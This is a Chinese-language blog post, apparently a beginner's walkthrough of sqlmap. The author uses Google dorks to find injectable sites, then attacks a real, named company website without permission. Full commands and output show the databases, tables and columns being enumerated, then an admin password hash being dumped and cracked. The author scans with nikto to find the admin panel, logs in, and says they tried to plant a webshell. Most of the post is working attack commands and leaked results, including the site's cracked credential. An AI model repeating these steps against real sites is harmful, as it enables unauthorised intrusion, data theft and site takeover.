SQLMAP的入门使用实例

Zss 发表于:

 

大概的思路是:找注入点,sqlmap尝试注入,猜解数据库名,表名,字段名,字段值,找管理地址

大概明白了sqlmap的注入流程,应该是自动合成各种sql语句值传参构成一个url来请求,具体的sql可以通-v 5查看到,但是目前看不明白
实际上懂sql注入的语句怎么写,完全可以用python自己构造注入 或者手动注入,那么灵活性也很高

通过谷歌来搜索一些存在注入漏洞的网站,纯粹是想找一个简单点的目标点,可怜啊,都是以失败告终...
用谷歌hack语法来搜索:公司inurl:".php?id="   结尾为公司,url中带有.php?id=的网页

然后用最简单的方式来测试注入点是否存在,就是在id=后面加入'号,看是否存在报错的情况
id一般是整型类型,但是传参给了'很容易出错的,就是对于传参没有做判断所以就有了注入点

找了很多,有很多网站存在这种情况,但是用sqlmap注入时不知道为什么大部分不行,最终还是有一个爆除了账号密码,不容易呀

1.python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 --dbs --delay 0.5
--delay 设置请求的延时为0.5秒,之前没设置一下子就被封了ip导致没法测了,--dbs爆出数据库名 --dbms "mysql" 指定数据库类型

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 --dbs --delay 0.5
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:10:16 /2019-05-28/

[16:10:16] [INFO] resuming back-end DBMS 'mysql'
[16:10:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:10:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:10:17] [INFO] fetching database names
[16:10:17] [INFO] used SQL query returns 2 entries
[16:10:17] [INFO] resumed: 'information_schema'
[16:10:17] [INFO] resumed: 'bdm266490221_db'
available databases [2]:
[*] bdm266490221_db
[*] information_schema

[16:10:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:10:17 /2019-05-28/

于是爆出了两个数据库名
available databases [2]:
[*] bdm266490221_db
[*] information_schema

2.再尝试爆表名,当我们知道了数据库名,那么直接指定数据库名
python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.5.142#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:12:48 /2019-05-28/

[16:12:48] [INFO] resuming back-end DBMS 'mysql'
[16:12:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:12:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:12:49] [INFO] fetching tables for database: 'bdm266490221_db'
[16:12:49] [INFO] used SQL query returns 9 entries
[16:12:49] [INFO] resumed: 'gplat_book'
[16:12:49] [INFO] resumed: 'gplat_news'
[16:12:49] [INFO] resumed: 'gplat_newsclass'
[16:12:49] [INFO] resumed: 'gplat_newsclass2'
[16:12:49] [INFO] resumed: 'href'
[16:12:49] [INFO] resumed: 'job'
[16:12:49] [INFO] resumed: 'job_add'
[16:12:49] [INFO] resumed: 'lawyer_wenda'
[16:12:49] [INFO] resumed: 'user'
Database: bdm266490221_db
[9 tables]
+------------------+
| user             |
| gplat_book       |
| gplat_news       |
| gplat_newsclass  |
| gplat_newsclass2 |
| href             |
| job              |
| job_add          |
| lawyer_wenda     |
+------------------+

[16:12:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:12:49 /2019-05-28/
爆出了9个表名,那么看名字应该就是user表了

3.爆字段
python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:39 /2019-05-28/

[16:15:39] [INFO] resuming back-end DBMS 'mysql'
[16:15:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:15:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:15:40] [INFO] fetching columns for table 'user' in database 'bdm266490221_db'
[16:15:40] [INFO] used SQL query returns 13 entries
[16:15:40] [INFO] resumed: 'id','int(6)'
[16:15:40] [INFO] resumed: 'name','varchar(60)'
[16:15:40] [INFO] resumed: 'pass','varchar(60)'
[16:15:40] [INFO] resumed: 'email','varchar(60)'
[16:15:40] [INFO] resumed: 'phone','varchar(14)'
[16:15:40] [INFO] resumed: 'times','datetime'
[16:15:40] [INFO] resumed: 'up_time','datetime'
[16:15:40] [INFO] resumed: 'xingb','varchar(2)'
[16:15:40] [INFO] resumed: 'adder','varchar(8)'
[16:15:40] [INFO] resumed: 'qianming','varchar(100)'
[16:15:40] [INFO] resumed: 'image','varchar(70)'
[16:15:40] [INFO] resumed: 'grade','varchar(12)'
[16:15:40] [INFO] resumed: 'admin','int(2)'
Database: bdm266490221_db
Table: user
[13 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| adder    | varchar(8)   |
| admin    | int(2)       |
| email    | varchar(60)  |
| grade    | varchar(12)  |
| id       | int(6)       |
| image    | varchar(70)  |
| name     | varchar(60)  |
| pass     | varchar(60)  |
| phone    | varchar(14)  |
| qianming | varchar(100) |
| times    | datetime     |
| up_time  | datetime     |
| xingb    | varchar(2)   |
+----------+--------------+

[16:15:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:15:40 /2019-05-28/

4.爆内容,看起来user和pass像是账号密码
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db -T user -C "user,pass" --dump --delay 0.5
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:18:43 /2019-05-28/

[16:18:43] [INFO] resuming back-end DBMS 'mysql'
[16:18:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:18:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:18:44] [INFO] fetching entries of column(s) '`user`, pass' for table 'user' in database 'bdm266490221_db'
[16:18:44] [INFO] used SQL query returns 1 entry
[16:18:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:18:45] [INFO] fetching number of column(s) '`user`, pass' entries for table 'user' in database 'bdm266490221_db'
[16:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:18:45] [INFO] retrieved: 1
[16:18:48] [INFO] retrieved:
[16:18:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[16:19:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[16:19:09] [INFO] retrieved: 4d9012b4a77a9524d675dad27c3276ab5705e5e8
[16:22:07] [INFO] recognized possible password hashes in column 'pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:22:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapvAfQDC24962/sqlmaphashes-9Y2NbI.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:22:45] [INFO] using hash method 'sha1_generic_passwd'
[16:22:45] [INFO] resuming password '123321' for hash '4d9012b4a77a9524d675dad27c3276ab5705e5e8'
Database: bdm266490221_db
Table: user
[1 entry]
+---------+---------------------------------------------------+
| user    | pass                                              |
+---------+---------------------------------------------------+
| <blank> | 4d9012b4a77a9524d675dad27c3276ab5705e5e8 (123321) |
+---------+---------------------------------------------------+

[16:22:45] [INFO] table 'bdm266490221_db.`user`' dumped to CSV file '/root/.sqlmap/output/www.yuebooemt.com/dump/bdm266490221_db/user.csv'
[16:22:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:22:45 /2019-05-28/

由于网络的问题没有爆出user,之前是出来了admin

5.既然有账号密码,那么应该是由一个管理地址,使用nikto -h url来扫描一下信息,看能不能出点什么信息
扫出来了可能是后台地址的路径,尝试了一下是管理地址,使用账号密码进入后就是想办法拿到webshell了
还是不能随便去搞破坏,怪不得别人说渗透学的好,牢房蹲到老
root@MiWiFi-R3L-srv:~# nikto -h http://www.yuebooemt.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          60.205.33.134
+ Target Hostname:    www.yuebooemt.com
+ Target Port:        80
+ Start Time:         2019-05-28 16:24:58 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 12 item(s) reported on remote host
+ End Time:           2019-05-28 16:27:50 (GMT8) (172 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

6.最后想在里面通过上传的方式上传一句话来拿到webshell,但是一直没有头绪